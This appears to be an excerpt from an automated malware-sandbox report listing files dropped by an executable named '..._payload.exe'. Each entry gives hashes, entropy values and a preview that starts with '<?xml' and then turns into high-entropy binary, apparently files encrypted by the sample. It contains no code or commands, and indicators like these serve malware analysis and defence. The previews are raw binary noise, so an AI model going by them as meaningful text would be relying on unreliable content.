                                                                                                Preview:<?xmla....6jP.....Y....x....Q._......1!.e<...A.9.....6K4.e..p>.S\a.qEb...m.w.i,.no.I^m...K..J..8>X.5p>.{.q........q!.6.....j....N...>P.B..R...r.......o...*...sLE7.!.d...*y4.._@S.|..%3.......<...z ....{....pNV.$uXy'...J.'.F.....k....n@rl..4..f.........5.....M.v...qU...%.O.A.*.F..rOR-......KDij$.OY.Z;....Z^.G]\|..2<..........:.7`...l......a.D...<v_...1.:H..j..LNP...}.#q..{..t...0.f.Mpu..ev..x!I.G]..g..Bn..nX\c.s .c..6].]4.....r=....'.GH..k[..8.a....j.c.@a.9.[.Nx.u.(..q[..T..Y5r.Vp...V...X5.....<.Y2.y...g....e.)..}..>.\........P....P')p'..pmV.y.$#ZS.j.~G]...fU..('...Ibx.n..-.l...5.F.ZP\bBr)...yA...&h5?_GK........;}0.}. ..u.A.....L#..>`B..B.........P.DI.T.A. Q5.P...@.j...pP...Fvk......uy.&4....~.......!.W..`.G...r.....dt'Ac...\..P.a2.K..JIYE.o../0~.U.....:tXA..q..:..E...no..^..F.aT.i.d....RT.%`..~[.........C.me.....!.....M..ex@qM)a.8.vx!........V..s....rW.f.fV.{.&a..Z...oJ..4e......s.b..3..Y......<.k'..iB..)s...... Z....l.'.!...(.d.8..w...r
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1073
                                                                                                Entropy (8bit):7.795150205910082
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:J/XsaStjIkqO77IsaGH39wa4jcNAKpx3bD:1XsaSZIpGX9wa4xKTLD
                                                                                                MD5:05F7DCAEE7F9A371B4E126D923F9EC71
                                                                                                SHA1:0C03AE083FD49F2D53BC3BE7631718CBC008E80B
                                                                                                SHA-256:06A0F2B4EC99A52C6ADF807F40CDA9C80F68B823378931E9EE2454B85EA54D41
                                                                                                SHA-512:8345717592A31B58E74F558DEB5CCB11C63E1FD0D302CD0EF720725923872A6D450FEE1973C742F4D21DAFD671208F5A4898404D0C26B70478501E0520CF9ED1
                                                                                                Malicious:false
                                                                                                Preview:<?xml.d.u...J..T....@..\.&..ql0..-gD....u..*=.s...B....y..d+?5.......N/L..1.J.4......J.....e...ai<~G;x_.j....f..{K..b/..t.?.fO...J.y...f.@...L......!....,.k.c/...@......M.'.9...<...!..ss..c.4JZ..4........."\....O{SBk..~z..xTv.#.....w.....y....e\.O+.#~'t.."|....%...`........f..M.+...../.>.n.:..~.{6.s....2.M...O.{UO.]l...a...G..U. ...I .C...p.0..*Q.[7..]..`...R:N......*.....4....%a...(.G..6f.......R.;....S......J...#0..7%..P..7...tDZ... .....ao.D...YT.1....&.v...7.2..]......F?t.=.....m..B.d..t5....[.z.GA.\..S.%..Z...jT.]X.E..$...%..9Z@...l..|...n..@.....K1..^...$.......c....Q..0.UZ. ..7(.'.........8>.z ....r...o... .a`o.7VH.+..../.J.._.!L.gk.......K!;b'..`...Cm..#6..../..d..!..h&.^.XE..k..4pW......)H;...H.....M..n.p0.P.A.%2O. ...'...1D..i..<..-...T.9.....Q....Z....s...HR..k."..J........V.|..xrq 3.|...&..........Ac.:.i..Aun...*].."s4{.......91.g.<.e.j..D....>H....&.Iyv....".m..-]..U.......%...6on..&I.>.}....|. d>`f...;p.Q.K..i...<.BUcuB
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):933
                                                                                                Entropy (8bit):7.80694519369
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1Fp04cYmpmc5s7sO9Lc9AKPqEv6w6B220tD+oXqgko3Iqx3bD:K2imcKsOyiKP9f6ghFhhXLD
                                                                                                MD5:A3973EA311DDC121B06987CB9C9A8A4D
                                                                                                SHA1:43605C6A2651E082CAADB17D022DE740A737FDD6
                                                                                                SHA-256:1CE07213DC0CB6C86F6127B436897B030E71895B5E467C11E454B0F7AB71EAE1
                                                                                                SHA-512:7EEC7C4CF45F8FC69AABC310B9557DDD18B01F49D0B04AE79DA1A3844BFD2A92B9AFB0EF5A16DC5BCAA7FD8FB3A8F46ED2CE05E57265F319E73730E4368293C7
                                                                                                Malicious:false
                                                                                                Preview:<?xmlT...i...WG....<}.)...=P...Z.3|...+..Z.1".....q...@A/............!..).$..........O.Y...<...H.....9.:..:.....R..d.uS(.......@.2.f..4.....n....}.u=........)y..^..3s...N.....@..=..8.....M.$l.j.....e.m`C....xy..Q.d^.......,"..-L..f...Abs....o..s.N.3...;..8n.5]K.~....D....y2D`..........a........~ .?._>E.J...9k..Juj]X.R..`.Y.z...'n( f.=....l0...4..=...V...h....F.....|/>....\...F./c..r.@..m..Gw...@...9......y...j.&......k5..^a.zk.. 8..(CI....,Y}.I.....-..:.m.b_k..#.J...K..............9.C\1.X.'..#..tg_.b........d./...j...%.E.@.Y...k...@?.... ..BXtO..~....._>..;..G.qY....[E..Fgl....S=......./.n.4.Zl\...:&........&...;.2......d.0.......K(......i.$>.....A..`V.K.w..o.. ..,..pG.FT>..6C.Q..+s"..0..3..z.....<.h.. .\...i$z.S..."S.....~......S._.z....].I..&.OoM...{=<....PK^..h..T..^.:].e. ...........@J.[jc.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):933
                                                                                                Entropy (8bit):7.71415469659008
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7HIcxBkg9JUIeokMsEGE1Vs1BhOXOPK5OSx3bD:9P9feAoE6BhOX0mLD
                                                                                                MD5:1D99BDFE57B42937EFBFD6413148A379
                                                                                                SHA1:248CA623EC62DB085253B7089B6AC25A2A59E9BF
                                                                                                SHA-256:7E053B1A8AF017ABBCBA9C7FF9A05DEB38E1DE8A5AEA9D55465618BBB37149C7
                                                                                                SHA-512:E8C6A10B978342EAA971434FD4BD6868577CA17E32510A2A8C591B2E787C5EDC1EC446F7735D0316D2F18F7FA81F536B6D06DCF49B2F3330A22550DE795DA05C
                                                                                                Malicious:false
                                                                                                Preview:<?xml...1e..9.q.'.'._.I5:#._.,w..^>.....y.l..>k.....a.u...f1S.i.3-+n.8..:.....|..j.a..G......%.r9.1..`..r....._.a..7.....|..:...S.(.|y.L..n...1....R.....F$'.8E.c.|D]..&.6.$z'../..>.#..7..k.{.dP.....cr...d..Q.k.4.[oJ`$^x.R...u.KP..RF..s....&....>.F...l\............h..c....q...ft......Z.......n5...A.z.H...H..|......|.].so....2./3.2.e...`OL[..k*...j..qT...R,~8l.[...v(WL"Xp.t:q..Z...3z1.\.76s..m....w.G?9g!..\DcHF....r.p....*...~..."tH@n.X....k.+.lkF/....<...z..X...Ur...s........Z.....$...Sj..1....=..s~&Lq.f....;.W7....a.`.s.4ro[.vK.M...yt.*....o.F>Z....g.....T...G.`..P5...#....iP...Q...X..N..........Y..O#...B...U...6aNZ...iS...z..P....2%.%m.1$kB:);I.....N..u.H.]{...N......9+]M...}SPQ..... t.b..B...T....|...,Po;.o...;....0u.....)..fq...X.13..2g.5.9%ns..>$....xP.$.1.Q.$.q9J....%.......+......t.e.kF#.^...Vi.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):945
                                                                                                Entropy (8bit):7.752628785902802
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mVCvzxlpOVTbY/oe5sImCbKBuUBuk2/SiOEzgZgx3bD:mVCvzxlpOda5sImHBXBvylLD
                                                                                                MD5:1BCC81C60CE71AC590D0148E67C312CB
                                                                                                SHA1:981A25B645C33A0CFC9C78AF587C7335E910169A
                                                                                                SHA-256:536512AF6EC5F64B8F29DC13D1D2EA54A6785BC0F1456FE0EBF2BBC990BCEB94
                                                                                                SHA-512:6B28833BEBCB5DB6B36E9C72432BA3C95F6BD30022AAFA6FB7144544A272BEFD41EACFB85295DA899A2E7E8BBA92AE3652441B839E4C87B18056476E71812871
                                                                                                Malicious:false
                                                                                                Preview:<?xml..-J=.A}..2.n..r..5....k.L.oy..9.M...<..?..Ys.5C2..k.5#.V.....o.9..._...._.`..S...x.:l........!..W.ie..T...D..o......6.8..W..M.\..{..,.4..Q...~.k...e....J..7../.....3....UQIH.%.....fm._...;..T...z.F....|..3.&.V.gsw......q.....a..........s.[..h......f...WJp.@...9.`.e.i".C...I{.L....40.....r.O(|...D.xWE....r.Y...D...|...[&......7.2...cu...4p..zku.]..g.O..G.Aec[..'.bM....m6.R..t...9P.9...`..._....z;..G.K>CPA.%..:...T.-...z`.kxPZ0.....L._..qC.L....&..^.....;%.(..G..E*0m.m.@@...m*...L.6%..=....+h..Ep.......T.$.v|..p..6..E.}....W...u..W....jx..L.s..J|.4J..%....BD....%.j*F'....BK..F.......`O~'.y.^1k1*.....l.....v..(.5.V.h.Sj...e...Zl..A..o 6..84P...E.iC.V.*..](.....SP.....h..N@6_.t#.._^.0..uq._].8....2.k.P9V...B...oZ...nP?;=.H.t.....O..u.{...o...A.....\.=+......Y..A;a.h.Lu..F=.#-.n,H. .B41g..3..+...6.a.[..-gh$..P.G.gBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):941
                                                                                                Entropy (8bit):7.749752055401621
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:hVkk2FsEiYilW5sC9yRjFuSihFleFzR6x3bD:gl3iYeW5c/xWFlWR+LD
                                                                                                MD5:B82DAB7B99825F4D61A1E4CD72355C03
                                                                                                SHA1:DF389E19B3C458410FA5F6C1A8054E78BA1F4D89
                                                                                                SHA-256:8954575822BD28A494769AB99F46D2C82E49B825943888870F841D12A26A86CC
                                                                                                SHA-512:CF2B879C278EA3F93F54AA29FBDFED42EBB18B448D48D67441E29A74CEFB3F35E455048DEE05351F2B14A79E9A11DA5713EE3F08E3392F20BD216CEE12CEB82E
                                                                                                Malicious:false
                                                                                                Preview:<?xml....>......:..>mz....%.$...C.h...;....k..rH..z,6X.z..Y...............}.]zy6...Q.g..}y/?..j...ce...M.k..c.(..J.../.......&...H.}~........d.z.'.R.XZu..9.r0.r#.h.1....'..cS>.5.d.9..$U.Z.8..l.|Ek.#1..XHy......^...>..LCu.".....\.|.LLj.c.!Q4......I.U.m.uD.UR...p..z.Q...F.A...a..5.!;...........z.......@s...v.....k~.Pl...$5.....:.a0nA}r..,Y7x'.w.Z..|L......Y#Y.:......*....00t..jwvU..f.y`...j...}....=p7.j.......f5.... .....J.....&.1H......o.....&T. ...?M....y.........`..F.......|J.H(....M.%.U.U.%N...8..x..&.FmJ.\..u>.|t`..Z..6......:=.2.....:Z.q...bRb?;x.\..g.Q#.:k.#u.ONQ.G]..........2g1W.$...19......i..1Y.....8.(......'..;....M....c.......1....k..]..y.L!g......"o.O>..hd.Q...&...art}....>\.p1....(S.Q....[.5.......f..g..'..`......"..F....*Y?..`!y3.6H..OJ1.G.....>...r.`y.0.k.....&V..y.F!G..^4..7.....e.!j...t.3V...5[|BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):945
                                                                                                Entropy (8bit):7.7629021259879005
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:CbkO1UEI9UuNEZ2ZBrxH2OrAYC/G/GPEMU4W5Oux3bD:U1U45ZyrCXa5LD
                                                                                                MD5:6F8D353DEAF78B03D922270A1E67926C
                                                                                                SHA1:30A85087BC220FCC2C942D9F4F1B7562C4BBA965
                                                                                                SHA-256:247F0F17F03154BE60B8E06554C2DAEED5FA2F3F1DD7EF2274E4BE7106A33498
                                                                                                SHA-512:5C51BA47C762E38A9C29B2CD0724F1B253D8741DD93440C23A2732BDF92F77614AEE1F193BC21BFC769EB87325C0C6ED526EF6E93AC4DECEF9AC309F6B9ECC70
                                                                                                Malicious:false
                                                                                                Preview:<?xml...A;..'.(w.x.v.....A.L@...q6.?...]r.......< p.S.x..f.._..l.f_.&e<.Yn.(...w5.!..6...1.Y.o...X...Mm...z....................Z.FPj...g.t.....Hn...).....>......=l@sF.h..vH...n.L6...8...'..P{p..N.#...........ER.A..F.A.#..S..c......:...v.6.....IB.~@.....R.hJ.v...M..E.q8p..7..7nL..O..r.Z.gg....*.(.......p....Tq..,o$.)x.l~...:.z.).T...G.$m..x.>.....7+..[..C..y.......0J`eG.28:.4..!(..B...V......%..eOC...d.....?.A......o..KE.Bqe..ZP........(....H.;...q.......sP+..s.:..b......Aro.'..[..(3H...6E.#..{..1Xzf.^....}.`^...q4.SZ......iZ.."~$.h.(pxr..Q....S..../...h..r....K.H).d.....e:...Yi..TJB...0.ut..{^ly........R7.....EN......K.x~c!.t.b[..d^,.Z_.=.a...G/...o6./ET,*Bl.o..zYR......?|.D`.PL..p.\....N...H$.1.l.JB#..m......".t~.b.............x...%.^Q.I...O.[x>7h..|}r:.}.c.p.M4.............p....*...W..gkZ..9b.4.../c....(..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):945
                                                                                                Entropy (8bit):7.761117146068215
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0PI2JmtTl6M09fel5IZ0PxlC8SPUqZdPa8pTipDmBc5x3bD:0PTmJln09feUFsM5pGp5DLD
                                                                                                MD5:8A2965454F1AA4CA2B6DF04F1404EC3D
                                                                                                SHA1:A54466414B53257D522DF3CAB4B95F9B3DB8B3DB
                                                                                                SHA-256:BF76334E732308FFC31604E5B919FA2BF82EEFE72AAD704C3E957DCCD57BC59C
                                                                                                SHA-512:921DB9836417A366C89AF8E64060E4B04EE5D50A389C21B1216755314E6038F15E4C71CA41B0544266CAE5C5DF37AF757C0E817B48F25B99050AA940523A5FBF
                                                                                                Malicious:false
                                                                                                Preview:<?xml...`@..L...q....QEo:M..........^.2..GU .F.F.L..gN.`.E..k..zK....[3D...TJ.iL.,=....`Cn.#'..=......q..'.O..#.....h4....xb....<|c..g....W.NF.)....e.......*w.....!|...~...P.9.!.k....mT.Td..cmW...|}..E..y..[..L..M[...v..Z...\j.....E..y.FLm.........$.o.*.S.<+V...z..`..6..\......@.^{GO.f.@g.,.E .P.)8n...NAb...b.].......>E...L..z..C.=IyNH...&"..Q...]...~7.QJE5..)..z...@.I.Q.....J.Otc....D.Z....\5.*..~n..\-...........P../|.E5..V.&y.....V.._..<XS5N._j........@.>.....[.....3.j...x.)g3....R.O..w..\...d.....)../...H.(.G....D...N.._.*4z.j.e.`....Z...M...<....f....T...t0.5B.....(.../.........X.j`....s...`...K...g...C..X..37h......9..@..23h..3.C.........V.M..b....C.E]D..R2.:?,;.pL..0&J....`..............A.....X..?...z$...h.. H..f..yn.e..].|..N1....P,U&.1t|....A.~....Ft~.y...(......U9..l.)t..."...m.\.f.. .....~.L.m.u.U..fD.>E8h6BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1000
                                                                                                Entropy (8bit):7.789929508633156
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:o772c5JMNIgzGMscpMI4x4ve7sOkDYU2mQzsGCux3bD:o7735DMsi54Wve7uzXXjiLD
                                                                                                MD5:03435B1EBC5904624120B45A36BA06C2
                                                                                                SHA1:0B4E9D8DC28A03F7146822CD800BDAA9CCF10765
                                                                                                SHA-256:46FE312CECAFE31FF3FC881DF7C7AF1381A2E092B3DEC30A5B1E8FE661125B59
                                                                                                SHA-512:39EA9553954FE11257863362AA0C1AC02F5E483BB4BCEC6ADB157CA5CC9B9C0604BFCDCF2807C738E172701E24A9F45FD7A7A403866170E965F047B17E98BCC9
                                                                                                Malicious:false
                                                                                                Preview:<?xml+...>]Y..l..B....\2....-..k!.S%f=*...R6..s....f..>.s..Q...b%...~L.....e.....\.K....5....=|.Bwg..$...J*..0....{Urw..6..~S...gL.c..#..)m....{.]<C.hn.......`W.ej'./.eXvKt.*.).3 .VE.:....1..v1.....v...k&.........!...`.....$m......'...5.o....$../%p.I.#=.j&.h..U...<43?..I..."x.......7....p..nYRm......v:...f.P.\!.X........Q*.......#..y5....tD...xS.E.x...<$48...]?]...;f...N*.T...U..lqI.....n...-QXp\.q....}...A..z..gU@...?].4.8k.}.b.u.V.@.z.......bnU.3.H......a...iL........R..)...[..NH..Y.7c.{mx.7......8.-`Y.B.J..7#.FY.a..1.z:..~..acK....K.....p.....p.%....vCH-6}.t>....E..J.....H..A./+..........f.a.b@`.'..f...-h..+..^{.|G}.S..`!~,PS......?....e.......5.B..y/z..k..b{7M...*}.....lh.C.......%.vW)..;m_Y.V...?1g...m#..........>+..S@..2P...>~.....d&.....2q*..[......^..7.....i..n..E_s@.B....@..S.w..[ h0JBCq..4....ES........./...LH...tB..}......a..k$... ..~...p.r.].....0..*BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1498
                                                                                                Entropy (8bit):7.850974210795605
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MaN7XHmZ3j7Wvj5tr5tb7ysS5VbN71KhvlCHx5G9nP1VXeEbCEdpwtT+2OcC7EJX:MaYZ3vgzrL77SzbNZKKHu9nP1VXeE+E0
                                                                                                MD5:49091E0957AEE703CA0E60F7C575C3FB
                                                                                                SHA1:FC61DB4556903585A49057D0BAF44002CDCDBCBE
                                                                                                SHA-256:C293CDCCC196183E8E4B19B27CB03C482181717EA33ACAB0888F2F74C77A3010
                                                                                                SHA-512:420D9064204360F6DB37DF3CDB631D4D98E1A21901B000B0D3100BCEB28B0BBD665AA1A4FDD59E11A82CF708A994685D6D0AA9F43F70F6CA28A174202D7B2C12
                                                                                                Malicious:false
                                                                                                Preview:<?xml.!;.d....;Z=<..v.n.D.P4.M..]&T.+...p...1..q.$...../.a.-..^.I.#.?.).@.}.XUp.........s.C.5. z..q..2....]...77g.rv.._._.h]C..IV........j';\.5]....`.48..,....zF...."..g......e....^7.....ao1..V.e....>.P..&.z..a....G.........G1.......$Q.`..d.;I"*.1I..u.c..-.I..S....j.n.S..k.1=.u.}s...`].{.\j_......ard..11...{._..+...=.Y..:....u...Z..?LxHZ...#.y.r7.)&D.....z..x..1...!...,_alkj......[u.~..,4.(.".FQ,_.......PM..b..T.4.E.E[`..|JC..*.8K..61.N.......}......P.+...]....T.... .E....2W....e.L..T.3...r.E..k.F.5.R..m\.g....}Ev....kM....?.?.+......C.o.``Uo.....;..I.BIhZ.8.&....(.....>q...B..x.?.".|..|0..UO"Qx.89qVeZv....t.AI.".i.....E.....D`Lx.b......=...A..kH7.o...W.iM0..4..Y..?].....n.....7C..0..\..8.L6..Ap...OD.....@...|..j....c.e..t S..5....E....(A.......=]...q......Z..-..y.W..bT.c........JHm'...T...%.V....lv....@x..6Gb1.J.R....D...vT.f.+...2.+..?H...m..z..&.c.6......69.*.].f.......^..h/.+.......Q...w.k....y...vK..K..Db..CO..D<..D<..|W...Y.g5.I.v.,.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1357
                                                                                                Entropy (8bit):7.833832307917946
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:p0cRgkFpqy/t3/lgvjVUzp/UReMjSTyXdlI+MDVCPAaq7GwkBitO+o9/x3bD:p/eUH13/l0yzpcp3XdWCob7IBiLonLD
                                                                                                MD5:32EF9057A7FEE01E7ACB04D5E0664762
                                                                                                SHA1:7BE3641B572BD2C98CD2038A4CB740B85291450E
                                                                                                SHA-256:585768ADBCD396A77A7D67860E5431B1B2BF312F5E930FC4816EA26FA84C3E32
                                                                                                SHA-512:3C7FD80AA62CC6D78E998A524C4EE4AD435BB69C1051F8494FF129F5FFAF4DE5DC22096C198ADA409C9ACBC0736E4F63D37493F2543B4B4D09045ED9C25D92B8
                                                                                                Malicious:false
                                                                                                Preview:<?xmlk\>..1gEZ.b.#.q.v.......?z.t.DZ..jc..r9s1....H.y2'..).}{...'(t"..;.7#.$..t...~...Z*&.hI&B.........<....x.y?l.JfB..C.*...V..'9BF(U.....Ww.{.......!.<.O-[...l..}f..EY/.T....9Q.o,p.M.....21...........4w..{;GD...M..G.*..>....=.+6...9...#..!.G......."}z.~....^..]N.Q...G..s;T....*.....N...3.l.w.H).^..o..7...E........k.....+3.'.=..Hv..C).@e...Q.....~..~.J...Fu......x..k.I..`.m...+.ZF.y...]l...7Z..d&4.!y......y9+.-..,...^..q..yM[B.7...x...l.G8&..)#5!):..K.%.A...d...D..g..m0l...`x..].J .~Ao$..........B.3w%...).o.u......q.d.d.:.KZ...=.C......L.r.<8.Od.>="d.>.DC..h.N7.a!o;D..Tvvr.d.1bs....Dn{.._9..O.......a...i..1.....h/}..YzI.1....8.E_.l&zp.e<y..V..........hj.)...NG>1......l..>2.n..-.,...rS@T.WC..]G.....>S.B.....U.........@....R..t..z&..1.v..L...#....k^..../..i-{...f..{1J.GZ?..K!.P^..@..n`._...H.9!.a.R67......./...X......"l......S[6...HY....e.S..#*...?...5W@....*..bA..Ec(.Ft...$v{.....X.K&Zt$..z9.-..H....IE.../.J.6.xm.*.9..?A..3v.kle1.}...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1049
                                                                                                Entropy (8bit):7.793003310774838
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0ppuMZcCDE/waWStMczTjI3ldYThB4UUpq3kq7N5psi5x3bD:oewiwaWStMwjIVdgld3BDLD
                                                                                                MD5:B48DB88D432CD94E15B2C7EFA471EDA3
                                                                                                SHA1:F811B4A0F6EE16C399A04A7D2F822F118C5478A6
                                                                                                SHA-256:4430F9802F2B4D15493AAF50A561CCE6BD3DE12CB738A092862619DCB8921EA8
                                                                                                SHA-512:3A63C05170C145C72F03C55742899B88E88016D3789B6C99E7BD3A01D9290758F95434663FB8DB93D02D0BF7AB8E78EC28FECA8A493DB4BA49AA4415E53820D2
                                                                                                Malicious:false
                                                                                                Preview:<?xml..d$,.r..m8N..pz...11.]Q......K.......*gxs..... .{.3....D$l.A9...R........RN?.....3.Y.....<.1....n.^E...#:G...] ....Xd..l.&.5H.T.gEN.u,.q.G..cp..'D...7.K..B....h..@....EBG..K..!J\....D1y.Z.....r..K....d.:.......;...d..j.Q.,...)..y..w)k..p....q..7t.M.a..z...d?.`..E..<L9...>z_L...1.Gu...N\...@h.DL...T.s..~......2...5x..47.lNO0....v..[Of.8f.2*u.a8a.|........V..'......v.G.\.F...f'.....q..Y..=`.....\.>|u..<...:.J .hx.o7......}..%c..(N...2.W.:...c9....a...B....Ge.......\..s)...=.!......]Ds.P.....~.-2sZ.....EK.0~..zT0Q.Y..4w]G.0e...-.UX.......PY......'..=..Y...%.b"...=....*.8.i|.J8..."a.w....|.J.0.2N..%I..!.Me$.~x.#.%..n.k...`......p\.Aw....7.gI..jQ..W...K..;5..r........~FO...4.. >llm...........VPZ...c.$c.Y...9.#*P..z...C.........}...ok' .....o)b....[.iUE. .).Fs...v.....S.W....q(.q}..E.f:x.=a|..x.=Z.m...........00...:`J..[......T..Bk$..#..H.r.u...f....9G4V...w.....9+.._...Y....0."H)....(....%..r].H.`?j..B.Z5h.rh wBUcuB8PRg0LNi380axIJs5BS8nCUd
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1184
                                                                                                Entropy (8bit):7.824224917034624
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Fn4OZB38t7T4fo17QB35ZO0uHuqCH6/Mg33xnQNX6Tyz7NNj5Be2gGBtox3bD:Fn4s3SgfA7QB35ZOvOqZMU3EKu7NNmjp
                                                                                                MD5:128D6882C0F25E9F9BF73D264843964E
                                                                                                SHA1:C9585ECE8AEE891F7A1E849B7FF3D5842F4A384E
                                                                                                SHA-256:E631A9570DAFC0B9BE74306D2D1004E1DC6BB63364F2E178107AEC904DC0A03C
                                                                                                SHA-512:37E9B21ACCB17170AAFDE82E5F84B8D52E555716B4CA491E5E9E8C76E579317F0EDB875671D631DEC9BD27BC0A7BD62CCB9AF769E88FD369CECDC80B248EF845
                                                                                                Malicious:false
                                                                                                Preview:<?xml...;lO..e.y.*P.,...\..q..%............F.... A.K..9...]..{.$...H.f....n8]y...{.4=..~.|.c.`....R...!..os.M.>..:8.)..../.IUYk.P.[..T..z.....k..W..h..n.SF...O.x+.po.6.I......V.....p.m..x..6....%.3^....Z.o...VH..G..R.[+.T..R.z....s.d.b.y.k.|...~...1c/w..P+[.'...&.6.S...PR..G......#f...z...l..)....?.c).k#......]..)_..,.=t...T.}..9Z.....}.D....,.g..<[dt.8H..a...(......P..:.e..p.Y...,....a...rY.u...zR*a....M4D......hG.8....Y..(.C.x...l.e.w..o..d..". ..w......5)..%.Rs.....Gpa.......AhC...s.@..a.^........~wO...,.I...^H>..s.o.....N..3..f>u....WV..j.....I<.....y..Itr...Ab....2.#[.g.Q...W.+Nk%...o.3....W=..nr.q..`.........@.J.P..G....]8..G..X0.6..Z...Mz.....o.%.q..]^..3.\. .'q..G. I.xQP_L...........%;aLN..o......b..[@..j..`B.Y.?U.Z.w*.e."|.a./...J1..q.6aw&..~...Q..#,.6aMc6.[......Y)U.....w.=.3.B.;..D-.e.H...r4A`...p%.&..|{2...B/..~G..iL...#..-.j...>[X.>...@\...v......br. ..d...V....Z.g..$...g..WH.i*..5.<....k...[..%.x.....;..v..._....O..Pp....1
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):9303
                                                                                                Entropy (8bit):7.983265652414198
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:42EETHaTWL1mL+e/BtVFDtWeg0UE5mUt9kgMfIH7UMqh37mY0ERn:gAaTamqGwegQ5mTzfKM3Ff
                                                                                                MD5:3ADA8B67E5A1D7CB85036DE41E165026
                                                                                                SHA1:8A8F75DFF7E0AF49F7B6F57FD56C8F651E0CB944
                                                                                                SHA-256:B518F7842E10770B25F35C2AC11E81899C03134FAC205F877010E3D5AAED6623
                                                                                                SHA-512:FDFB46036D9CB32D8095753B46AA12D9AA23E1D0C8D7413401C0B5B5D980C46BCA183A186B814D9C5DA9FC6C33FAEEAECC2FAF84DAC224B8D76A3FF318D100BE
                                                                                                Malicious:false
                                                                                                Preview:<?xml.%v>....?....l:jl.h....[...=.e..y.bO...b8'.Q.. ..\a..6.@1.. .fV...%....\.V.....aQR.2.K....A.g.i...,......J....+PRz.K.&...+F`...P..OeJ8.O.Jk#....^./...^.......H...K.T..r...&.......)k|....>`..@a.?n..V..6}..3............YF.$....EQT.m.c....?..!....9...SB.*)..49t.{........T.N...9.5..K>.T....H.o@s.3Y4y....%.D.Pg[.jQ.....j..Cn.x.T.N....>..7.M....}.u....<@.T...v...A... ...I9..S..\$[.>R...@...$.....b^`.......j.c...p..7&qvA._...'...D..1D.._.#...x."(........@....tlB..F.. ...s..c.\.O...@..i26.g.U.......C...!M.>.......dbx/..B|..y&^?r.R.+..=..fC..ar..~.6..~........\..W9.0D......K..4HX%.'../=?.....H.......\.[8.k..!.l.............\..P..M...x...e.a......N.Q.%.....,[...Od...A...-....JC1...:.[.]..Wj.|.. .2j..:..""M.9K...F.....O..;.R1.:(|..6"\.Hv....*...(.A..&..:..7"..5.^k.r...Y&...}.....WG..&+|22..'O.z..?..x........m.? ....h.$.V.A.d.\...x2N.....8!$.$.].)...O%.b.[XB}....`...P P.qWj.8.w...w....E..}....=.....m.}.<T...#..'..kz.z)p!.j..B.1C.6|...;.Ye.r
